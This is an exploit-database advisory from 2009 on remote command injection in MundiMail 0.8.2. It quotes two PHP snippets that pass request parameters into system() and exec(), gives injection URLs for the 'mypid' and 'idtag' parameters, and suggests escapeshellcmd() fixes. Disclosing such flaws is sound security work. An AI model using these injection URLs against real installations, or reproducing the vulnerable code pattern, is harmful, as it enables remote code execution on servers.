[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MundiMail 0.8.2 Remote Code Execution
# Published : 2009-09-07
# Author : Dedalo
# Previous Title : ChartDirector 5.0.1 (cacheId) Arbitrary File Disclosure Vulnerability
# Next Title : Mambo Component com_zoom (catid) Blind SQL Injection Vulnerability


# Reference: http://www.ccat.edu.mx/advisors/advisor5/advisor5.html
# Credits: Ccat Research Labs   - México - Coatepec, Ver.  www.ccat.edu.mx

# Software Link: http://sourceforge.net/projects/mundimail/
# Tested on: Debian, Centos & Windows Server 2000

Preview:

Code uses System() and Exec() without good practices in security.


1.- First Vulnerable Code

//need to kill daemon
		$cmd = "/bin/kill";
		$cmd .= " " . $_REQUEST["mypid"];
		system($cmd);

2.- Explotation

/admin/satus/index.php?mypid=command;


3.- Fixation


$cmd .= " " . escapeshellcmd($_REQUEST["mypid"]);

4.- Second Vulnerable Code

$cmd = ROOTDIR . "include/massmail.php";
		$cmd .= ' ' . $_REQUEST["idtag"];
		$cmd .= ' > /dev/null';
		$cmd .= ' &';
		echo $cmd . "<br>n";
		exec($cmd);
		$mid = "../mail/success.php";

5.- Explotation

/admin/status/index.php?idtag=command;


6.-fixation

$cmd .= ' ' . escapeshellcmd($_REQUEST["idtag"]);


7.- Other

We Can use other types of Fixation bug this is an easy one ;)


8.- Greetz

www[dot]seguridadblanca[dot]com


--------------
Happy Hacking
--------------